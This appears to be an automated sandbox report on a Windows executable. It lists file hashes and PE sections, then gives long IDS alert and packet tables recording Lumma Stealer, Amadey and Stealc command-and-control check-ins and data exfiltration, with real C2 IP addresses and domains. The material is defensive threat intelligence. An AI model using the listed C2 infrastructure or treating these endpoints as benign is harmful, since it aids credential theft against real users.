SHA1:	883BF672A0C81BFBE2F68CF4DAB49286593EEB80
SHA-256:	EC32F4C1A4F65D3DF458372ACE39AD5C45691F99037331929D5A87736E6638E9
SHA-512:	4EF991D57CE99AC31C40C0AFF28A5990478FAE58077729FF12F6AAB15C6932FC40D55DAE7FAB29D9FB48842B8507E52E1E26B38E66E8D34FB5ACEB157BCD2AA5
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Od\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_jd gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.666939659001904
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'235'328 bytes
MD5:	80780678447355a2bc3157723d80033b
SHA1:	3ca0030f2582c21959f2b5d25cf57a926a4314a1
SHA256:	def526b2c332d0019092a86b5686c4ed246779cd8e3235aef94c4901dfc7d361
SHA512:	90fade4ec430ffd1f165d6cbef9ae8d4d9f93f17200c0907f85e5c653484d72e0c7471a32bd42544dff4350e96a4c16521c87e5779b8b068f9f8c85a662ee546
SSDEEP:	49152:tRCiNmW7ggey/6JYzvfqTkGkJHi9Eu+0yp++IhT/W/oa/EiS:6sj9eM6JYzvfYkGkJC2u+08++IaDEi
TLSH:	07E57B96B94661CBD8CE2774952BED469B4F42FA431408CF986CE0B97DA7DC102FEC24
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x717000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F5E90EB593Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x315004	0x10	dwzjxvhv
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x314fb4	0x18	dwzjxvhv
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	9215e67b7d5cf487688e0f1094257922	False	0.5596829927884616	data	7.098034076925693	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	b7d16686b376821266a9345c26b7e6d6	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dwzjxvhv	0x6b000	0x2ab000	0x2aa200	1d1ac66b2dc9458141ef20af470e2438	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mmbykldk	0x316000	0x1000	0x600	11e1e4abcfa58d108ca1f2d16ffc9c5c	False	0.5950520833333334	data	5.112383217348512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x317000	0x3000	0x2200	ca243c9085491b159df9ae117b75daef	False	0.05698529411764706	DOS executable (COM)	0.6911209290473692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T18:44:48.799836+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60576	104.21.5.155	443	TCP
2024-11-05T18:44:48.799836+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60576	104.21.5.155	443	TCP
2024-11-05T18:45:13.122388+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.4	49730	TCP
2024-11-05T18:45:51.343661+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.4	49736	TCP
2024-11-05T18:46:04.415246+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49786	185.215.113.43	80	TCP
2024-11-05T18:46:07.775635+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49804	31.41.244.11	80	TCP
2024-11-05T18:46:15.209393+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49798	TCP
2024-11-05T18:46:16.115073+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49845	185.215.113.43	80	TCP
2024-11-05T18:46:17.025081+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49851	185.215.113.16	80	TCP
2024-11-05T18:46:22.052673+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	59286	1.1.1.1	53	UDP
2024-11-05T18:46:22.082251+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	62892	1.1.1.1	53	UDP
2024-11-05T18:46:22.129077+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	51650	1.1.1.1	53	UDP
2024-11-05T18:46:22.277677+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	59659	1.1.1.1	53	UDP
2024-11-05T18:46:22.497377+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	62431	1.1.1.1	53	UDP
2024-11-05T18:46:22.599431+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.4	57561	1.1.1.1	53	UDP
2024-11-05T18:46:23.209934+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49877	185.215.113.43	80	TCP
2024-11-05T18:46:23.446833+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:23.446833+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:23.653795+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:23.653795+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:24.129573+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49883	185.215.113.16	80	TCP
2024-11-05T18:46:24.476584+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:24.476584+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:25.468728+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:25.468728+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:26.519966+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49892	104.21.5.155	443	TCP
2024-11-05T18:46:26.519966+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49892	104.21.5.155	443	TCP
2024-11-05T18:46:27.967613+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49897	104.21.5.155	443	TCP
2024-11-05T18:46:27.967613+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49897	104.21.5.155	443	TCP
2024-11-05T18:46:29.338402+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49900	185.215.113.43	80	TCP
2024-11-05T18:46:29.987297+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49902	104.21.5.155	443	TCP
2024-11-05T18:46:29.987297+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49902	104.21.5.155	443	TCP
2024-11-05T18:46:30.324539+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49904	185.215.113.16	80	TCP
2024-11-05T18:46:32.507736+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49911	104.21.5.155	443	TCP
2024-11-05T18:46:32.507736+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49911	104.21.5.155	443	TCP
2024-11-05T18:46:32.639615+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49909	185.215.113.206	80	TCP
2024-11-05T18:46:32.878381+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49911	104.21.5.155	443	TCP
2024-11-05T18:46:32.929040+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49909	185.215.113.206	80	TCP
2024-11-05T18:46:32.935213+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49909	TCP
2024-11-05T18:46:33.317944+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49909	185.215.113.206	80	TCP
2024-11-05T18:46:33.330922+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49909	TCP
2024-11-05T18:46:34.051559+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49915	104.21.5.155	443	TCP
2024-11-05T18:46:34.051559+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49915	104.21.5.155	443	TCP
2024-11-05T18:46:34.530030+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49909	185.215.113.206	80	TCP
2024-11-05T18:46:34.595176+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49917	185.215.113.43	80	TCP
2024-11-05T18:46:35.219583+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49909	185.215.113.206	80	TCP
2024-11-05T18:46:35.633054+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49920	185.215.113.16	80	TCP
2024-11-05T18:46:36.456983+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49923	104.21.16.142	443	TCP
2024-11-05T18:46:37.540802+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	51691	1.1.1.1	53	UDP
2024-11-05T18:46:37.623641+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	60000	1.1.1.1	53	UDP
2024-11-05T18:46:37.657750+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49923	104.21.16.142	443	TCP
2024-11-05T18:46:37.657750+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49923	104.21.16.142	443	TCP
2024-11-05T18:46:37.885333+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	61458	1.1.1.1	53	UDP
2024-11-05T18:46:37.933111+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	54836	1.1.1.1	53	UDP
2024-11-05T18:46:38.018361+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	52344	1.1.1.1	53	UDP
2024-11-05T18:46:38.982124+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:46:38.982124+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:46:39.592638+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:46:39.592638+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:46:40.508692+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49949	104.21.5.155	443	TCP
2024-11-05T18:46:40.508692+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49949	104.21.5.155	443	TCP
2024-11-05T18:46:40.712975+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49951	104.21.16.142	443	TCP
2024-11-05T18:46:40.787195+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:40.787195+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:40.818282+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49950	185.215.113.43	80	TCP
2024-11-05T18:46:41.150018+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:41.150018+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:41.251881+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49951	104.21.16.142	443	TCP
2024-11-05T18:46:41.251881+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49951	104.21.16.142	443	TCP
2024-11-05T18:46:41.282999+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49949	104.21.5.155	443	TCP
2024-11-05T18:46:42.516566+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49964	104.21.16.142	443	TCP
2024-11-05T18:46:43.121000+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49968	104.21.5.155	443	TCP
2024-11-05T18:46:43.121000+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49968	104.21.5.155	443	TCP
2024-11-05T18:46:43.190843+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49966	185.215.113.16	80	TCP
2024-11-05T18:46:43.250970+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49964	104.21.16.142	443	TCP
2024-11-05T18:46:44.513020+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49981	104.21.16.142	443	TCP
2024-11-05T18:46:45.027023+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49984	104.21.5.155	443	TCP
2024-11-05T18:46:45.027023+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49984	104.21.5.155	443	TCP
2024-11-05T18:46:46.994220+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49995	104.21.16.142	443	TCP
2024-11-05T18:46:47.141209+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49998	104.21.5.155	443	TCP
2024-11-05T18:46:47.141209+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49998	104.21.5.155	443	TCP
2024-11-05T18:46:50.475026+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50021	104.21.5.155	443	TCP
2024-11-05T18:46:50.475026+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50021	104.21.5.155	443	TCP
2024-11-05T18:46:51.852584+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50034	104.21.16.142	443	TCP
2024-11-05T18:46:53.990226+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:55.186726+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-05T18:46:55.186726+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-05T18:46:55.367403+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:55.545227+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60467	104.21.16.142	443	TCP
2024-11-05T18:46:56.283590+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:56.980777+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:46:58.481039+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60481	104.21.5.155	443	TCP
2024-11-05T18:46:58.481039+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60481	104.21.5.155	443	TCP
2024-11-05T18:46:59.057136+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	60481	104.21.5.155	443	TCP
2024-11-05T18:46:59.332377+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:47:00.160603+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	50003	185.215.113.206	80	TCP
2024-11-05T18:47:00.186697+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60494	104.21.16.142	443	TCP
2024-11-05T18:47:00.898710+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	60494	104.21.16.142	443	TCP
2024-11-05T18:47:04.754298+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	60511	185.215.113.16	80	TCP
2024-11-05T18:47:08.249359+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	61019	1.1.1.1	53	UDP
2024-11-05T18:47:08.277787+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	50700	1.1.1.1	53	UDP
2024-11-05T18:47:08.307763+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	55546	1.1.1.1	53	UDP
2024-11-05T18:47:08.332733+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	64493	1.1.1.1	53	UDP
2024-11-05T18:47:08.364126+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	54982	1.1.1.1	53	UDP
2024-11-05T18:47:09.018199+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60560	104.21.5.155	443	TCP
2024-11-05T18:47:09.018199+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60560	104.21.5.155	443	TCP
2024-11-05T18:47:09.172675+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	60560	104.21.5.155	443	TCP
2024-11-05T18:47:09.172675+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	60560	104.21.5.155	443	TCP
2024-11-05T18:47:10.263364+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60563	104.21.5.155	443	TCP
2024-11-05T18:47:10.263364+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60563	104.21.5.155	443	TCP
2024-11-05T18:47:10.625383+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	60563	104.21.5.155	443	TCP
2024-11-05T18:47:10.625383+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	60563	104.21.5.155	443	TCP
2024-11-05T18:47:11.455309+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60570	104.21.5.155	443	TCP
2024-11-05T18:47:11.455309+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60570	104.21.5.155	443	TCP
2024-11-05T18:47:12.161407+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	60570	104.21.5.155	443	TCP
2024-11-05T18:47:12.987478+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60572	104.21.5.155	443	TCP
2024-11-05T18:47:12.987478+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60572	104.21.5.155	443	TCP
2024-11-05T18:47:14.435829+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60573	104.21.5.155	443	TCP
2024-11-05T18:47:14.435829+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60573	104.21.5.155	443	TCP
2024-11-05T18:47:16.724211+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60574	104.21.5.155	443	TCP
2024-11-05T18:47:16.724211+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60574	104.21.5.155	443	TCP
2024-11-05T18:47:19.633690+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	60575	104.21.5.155	443	TCP
2024-11-05T18:47:19.633690+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	60575	104.21.5.155	443	TCP
2024-11-05T18:47:19.637124+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	60575	104.21.5.155	443	TCP
2024-11-05T18:47:21.793946+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	60576	104.21.5.155	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 18:44:48.799835920 CET	49675	443	192.168.2.4	173.222.162.32
Nov 5, 2024 18:44:58.409204006 CET	49675	443	192.168.2.4	173.222.162.32
Nov 5, 2024 18:45:11.129220963 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:11.129273891 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:11.129657030 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:11.131762981 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:11.131776094 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:11.939712048 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:11.940001965 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:11.943032980 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:11.943044901 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:11.943298101 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:11.987348080 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:12.857326031 CET	49730	443	192.168.2.4	20.109.210.53
Nov 5, 2024 18:45:12.899323940 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.121135950 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.121160030 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.121169090 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.121182919 CET	443	49730	20.109.210.53	192.168.2.4
Nov 5, 2024 18:45:13.121213913 CET	443	49730	20.109.210.53	192.168.2.4
